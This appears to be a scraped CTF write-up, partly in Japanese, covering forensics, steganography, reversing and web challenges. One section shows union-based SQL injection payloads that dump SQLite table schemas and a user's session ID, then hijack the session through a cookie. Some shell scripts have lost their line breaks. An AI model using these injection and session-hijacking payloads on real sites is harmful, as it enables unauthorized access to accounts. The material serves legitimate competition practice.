Time Remaining: 0d 8h 24m 15s
Grab Bag - 100 points
Surprised Pikachu is old. Let’s get this surprised cat going.
Grab Bag - 100 points
Surprised Pikachu is old. Let’s get this surprised cat going.
Grab Bag - 100 points
$ file flagflag: bzip2 compressed data, block size = 400k
$ file flagflag.dat: Zip archive data, at least v2.0 to extract
mv -f flag flag2while :doif [ "`cat flag2 | grep MCA{`" ]; then break; fiout=`file flag2`echo $outcase "$out" in*bzip2* )mv -f flag2 flag2.bz2bunzip2 flag2.bz2;;*Zip* )unzip flag2mv -f flag flag2;;*ASCII* )base64 -d flag2 > flagmv -f flag flag2;;*gzip* )mv -f flag2 flag2.gzgunzip flag2.gz;;*init=* )base64 -d flag2 > flagmv -f flag flag2;;* )break;;esacdone
Web - 100 points
for i in `seq 1 1000`doout=`curl$i/`if [ "`echo $out | grep MCA{`" ]; then break; fidoneecho $out
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Sanity Check 1
Find the flag in topic of the Slack channel
Author : Al Capwn
you`ll need your glasses or good pair of eyes and some brainzzz.
$ file finalfinal: data
抽出したテキストファイルに記載されている文字列をsubmitしてみるとフラグでした。$ steghide --extract -sf final.bmp -p 3c034c8ecf5121fc23612ef9d71756b0 -xf aaa.txtwrote extracted data to "aaa.txt".
Maria is the only person who can view the flag
2つのテーブル名が取得できました。' union select 1, 2, 3, group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
次のようにCREATE TABLE文を取得できました。' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_users'--
CREATE TABLE "nxf8_users" ("id" int(10) NOT NULL,"name" varchar(255) NOT NULL,"email" varchar(255) NOT NULL,"password" varchar(255) NOT NULL,"role" varchar(100) DEFAULT NULL);
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_sessions'--
CREATE TABLE "nxf8_sessions" ("id" int(10) NOT NULL,"user_id" varchar(255) NOT NULL,"ip_address" varchar(255) NOT NULL,"session_id" varchar(255) NOT NULL);
' union select 1, 2, 3, id FROM nxf8_users where name = 'Maria'--
' union select 1, 2, 3, session_id FROM nxf8_sessions where user_id = '5'--
Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
can you get the flag out to hack a nice day. Note: Flag format flag{XXXXXXX}
$ file info.jpginfo.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "badisbad", baseline, precision 8, 194x259, frames 3
$ steghide extract -sf info.jpgEnter passphrase: badisbadwrote extracted data to "flaggg.txt".
Can you find the password to obtain the flag?
$ file ScrambledEgg.exeScrambledEgg.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
public char[] Letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_".ToCharArray();private void Button_Click(object sender, RoutedEventArgs e){string value = new string(new char[]{this.Letters[5],this.Letters[14],this.Letters[13],this.Letters[25],this.Letters[24]});if (this.TextBox1.Text.Equals(value)){MessageBox.Show(new string(new char[]{this.Letters[5],this.Letters[11],this.Letters[0],this.Letters[6],this.Letters[26],this.Letters[8],this.Letters[28],this.Letters[11],this.Letters[14],this.Letters[21],this.Letters[4],this.Letters[28],this.Letters[5],this.Letters[14],this.Letters[13],this.Letters[25],this.Letters[24],this.Letters[27]}));}}
famous Cybersecurity conference runs by OWASP in different locations
not pretty much many options. No need to open a link from a browser, there is always a different way
<!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])-->
<script><!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])--></script>